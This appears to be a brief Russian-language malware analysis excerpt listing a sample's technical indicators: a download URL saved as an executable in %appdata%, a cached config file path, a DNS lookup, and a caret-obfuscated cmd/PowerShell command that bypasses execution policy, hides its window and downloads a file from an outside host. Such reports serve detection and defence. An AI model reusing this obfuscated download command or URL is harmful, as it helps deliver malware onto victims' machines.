Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^erS^H^ELl.Exe ^-Exe^c^UtIO^N^pOLiCY b^YP^AsS^ -N^oPro^fILE -^WInd^oW^STY^le hid^deN ^(NeW^-ObjEC^T s^y^ST^eM^.^ne^t.w^eBc^Li^EnT^)^.D^oWn^LOA^dF^i^LE^('http://www.do...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^oW^erS^H^ELl.Exe ^-Exe^c^UtIO^N^pOLiCY b^YP^AsS^ -N^oPro^fILE -^WInd^oW^STY^le hid^deN ^(NeW^-ObjEC^T s^y^ST^eM^.^ne^t.w^eBc^Li^EnT^)^.D^oWn^LOA^dF^i^LE^('http://www.do... (со скрытым окном)